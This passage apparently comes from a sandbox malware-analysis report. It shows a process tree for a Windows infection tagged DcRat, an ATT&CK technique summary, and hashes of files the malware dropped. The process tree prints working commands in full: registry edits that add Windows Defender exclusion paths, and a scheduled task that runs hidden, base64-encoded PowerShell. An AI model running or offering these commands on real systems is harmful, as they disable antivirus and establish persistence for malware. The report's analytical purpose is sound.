                                                                                                                                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:1264
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:6676
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:6832
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:6100
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:3412
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:5500
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:460
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:3572
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:6860
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:180
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wKAtYsCOU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:5208
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wKAtYsCOU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:6964
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OsVMcSWGRXGXAxVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:6752
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OsVMcSWGRXGXAxVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:7012
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:7024
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            PID:5728
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IIxDORIMmvvtwMVt /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:4952
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IIxDORIMmvvtwMVt /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:5764
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "gADVgHUXR" /SC once /ST 04:32:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • DcRat
                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                              PID:4624
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                              schtasks /run /I /tn "gADVgHUXR"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:3308
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 388 -ip 388
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                              PID:3560
                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:5816
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:3448
                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff9b3446f8,0x7fff9b344708,0x7fff9b344718
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:6312
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                                                    "LogonUI.exe" /flags:0x4 /state0:0xa38d7855 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:6540
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:4604

                                                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                      Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1158

                                                                                                                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                                                                                                                      File Permissions Modification

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1222

                                                                                                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                                                                                                      Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1158

                                                                                                                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                                                                                                                      4
                                                                                                                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                                                                                                      6
                                                                                                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                                                                                                      6
                                                                                                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                                                                                                                      Process Discovery

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1057

                                                                                                                                                                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1018

                                                                                                                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                                                                                                                      4
                                                                                                                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24562\VCRUNTIME140.dll
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        81KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        2ebf45da71bd8ef910a7ece7e4647173

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        4ecc9c2d4abe2180d345f72c65758ef4791d6f06

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        cf39e1e81f57f42f4d60abc1d30ecf7d773e576157aa88bbc1d672bf5ad9bb8b

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        a5d3626553731f7dc70f63d086bd9367ea2c06ad8671e2578e1340af4c44189ecb46a51c88d64a4b082ce68160390c3f8d580dde3984cd254a408f1ef5b28457

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24562\VCRUNTIME140.dll
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        81KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        2ebf45da71bd8ef910a7ece7e4647173

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        4ecc9c2d4abe2180d345f72c65758ef4791d6f06

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        cf39e1e81f57f42f4d60abc1d30ecf7d773e576157aa88bbc1d672bf5ad9bb8b

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        a5d3626553731f7dc70f63d086bd9367ea2c06ad8671e2578e1340af4c44189ecb46a51c88d64a4b082ce68160390c3f8d580dde3984cd254a408f1ef5b28457

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24562\_asyncio.pyd
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        55KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        a2fff5c11f404d795e7d2b4907ed4485

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        3bf8de6c4870b234bfcaea00098894d85c8545de

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        ed7830d504d726ce42b3b7a1321f39c8e29d1ebad7b64632e45b712f0c47e189

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        0cd1329989946cfbcad2fd28b355f3bf3a731f5f8da39e3a0ddf160a7aac1bd23046fb902a6b27499026641929ddcef58f80ea3c0bfc58cb25ee10a0b39bdf02

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24562\_asyncio.pyd
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        55KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        a2fff5c11f404d795e7d2b4907ed4485

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        3bf8de6c4870b234bfcaea00098894d85c8545de

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        ed7830d504d726ce42b3b7a1321f39c8e29d1ebad7b64632e45b712f0c47e189

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        0cd1329989946cfbcad2fd28b355f3bf3a731f5f8da39e3a0ddf160a7aac1bd23046fb902a6b27499026641929ddcef58f80ea3c0bfc58cb25ee10a0b39bdf02

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24562\_bz2.pyd
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        76KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        2002b2cc8f20ac05de6de7772e18f6a7

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        b24339e18e8fa41f9f33005a328711f0a1f0f42d

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        645665cf3338e7665e314f53fbbcb3c5d9174e90f3bf65ddbdc9c0cb24a5d40d

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        253d0c005758fcb9e0980a01016a34073e7cdffb6253a2ba3d65a2bb82764638f4bd63d3f91a24effd5db60db59a8d28155e7d6892d5cc77c686f74bf0b05d0a

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24562\_bz2.pyd
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        76KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        2002b2cc8f20ac05de6de7772e18f6a7

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        b24339e18e8fa41f9f33005a328711f0a1f0f42d

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        645665cf3338e7665e314f53fbbcb3c5d9174e90f3bf65ddbdc9c0cb24a5d40d

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        253d0c005758fcb9e0980a01016a34073e7cdffb6253a2ba3d65a2bb82764638f4bd63d3f91a24effd5db60db59a8d28155e7d6892d5cc77c686f74bf0b05d0a

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24562\_ctypes.pyd
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        113KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        c827a20fc5f1f4e0ef9431f29ebf03b4

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        ee36cb853d79b0ba6b4e99b1ef2fbae840c5489d

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        d500cff28678eced1fc4b3aeabecc0f3b30de735fdefe90855536bc29fc2cb4d

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        d40b816cde6bdf6e46c379674c76f0991268bd1617b96a4e4f944b80e12692ce410e67e006b50b6a8cfaef96aacc6cb806280bac3aa18ee8690669702d01065c

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24562\_ctypes.pyd
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        113KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        c827a20fc5f1f4e0ef9431f29ebf03b4

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        ee36cb853d79b0ba6b4e99b1ef2fbae840c5489d

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        d500cff28678eced1fc4b3aeabecc0f3b30de735fdefe90855536bc29fc2cb4d

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        d40b816cde6bdf6e46c379674c76f0991268bd1617b96a4e4f944b80e12692ce410e67e006b50b6a8cfaef96aacc6cb806280bac3aa18ee8690669702d01065c

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24562\_hashlib.pyd
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        37KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        f9799b167c3e4ffee4629b4a4e2606f2

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        37619858375b684e63bffb1b82cd8218a7b8d93d

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        02dd924d4ebfbb8b5b0b66b6e6bb2388fccdad64d0493854a5443018ad5d1543

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        1f273bb5d5d61970143b94696b14887faa5ed1d50742eccec32dbd87446d696ff683053542c3be13d6c00597e3631eb1366abb6f145d8cc14d653d542893001b

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24562\_hashlib.pyd
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        37KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        f9799b167c3e4ffee4629b4a4e2606f2

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        37619858375b684e63bffb1b82cd8218a7b8d93d

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        02dd924d4ebfbb8b5b0b66b6e6bb2388fccdad64d0493854a5443018ad5d1543

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        1f273bb5d5d61970143b94696b14887faa5ed1d50742eccec32dbd87446d696ff683053542c3be13d6c00597e3631eb1366abb6f145d8cc14d653d542893001b

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24562\_lzma.pyd
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        154KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        38c434afb2a885a95999903977dc3624

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        57557e7d8de16d5a83598b00a854c1dde952ca19

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        bfe6e288b2d93905f5cbb6d74e9c0fc37145b9225db6d1f00c0f69eb45afd051

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        3e59b79c47cb022d7acec0af164c0225cd83588d5e7f8ca3e8a5dfae27510646391a1b08d86d5ee0b39d1b6bf08409d3758488df3c8cc4d458bed9faab7686e8

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24562\_lzma.pyd
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        154KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        38c434afb2a885a95999903977dc3624

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        57557e7d8de16d5a83598b00a854c1dde952ca19

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        bfe6e288b2d93905f5cbb6d74e9c0fc37145b9225db6d1f00c0f69eb45afd051

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        3e59b79c47cb022d7acec0af164c0225cd83588d5e7f8ca3e8a5dfae27510646391a1b08d86d5ee0b39d1b6bf08409d3758488df3c8cc4d458bed9faab7686e8

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24562\_overlapped.pyd
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        38KB

                                                                                                                                                                                                                                                                                                                        MD5

